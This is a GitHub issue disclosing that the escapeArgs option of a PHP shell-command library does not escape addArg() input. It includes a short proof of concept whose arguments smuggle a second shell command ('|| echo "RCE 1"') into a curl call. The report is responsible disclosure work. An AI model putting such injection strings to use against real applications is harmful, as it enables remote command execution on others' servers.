Skip to content

escapeArgs option is not working properly #44

Closed
@Kirill89

Description

@Kirill89

I expect that addArg() escapes all arguments preventing possibility of command injection from untrusted sources.

Because in the README.md I see:

  • Handle argument escaping

  • $escapeArgs: Whether to escape any argument passed through addArg(). Default is true.

But it is not actually happens.

PoC:

<?php
require_once 'vendor/autoload.php';

use mikehaertl\shellcommand\Command;

$command = new Command(array(
    'command' => 'curl',
    'escapeArgs' => true,
));
// In this example "escapeArgs" is set to "true", but escaping is not happens.
$command->addArg('http://example.com --wrong-argument || echo "RCE 1"');
$command->execute();
echo $command->getOutput(); // RCE 1

$command = new Command(array(
    'command' => 'curl http://example.com',
    'escapeArgs' => true,
));
$command->addArg('http://example.com');
// In this example, the second argument will be escaped properly, but the first one - not.
$command->addArg('--header foo --wrong-argument || echo "RCE 2" ||', 'bar');
$command->execute();
echo $command->getOutput(); // RCE 2

Disclaimer

This thread was initially started as a private email conversation. @mikehaertl asked me to open an issue here.

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions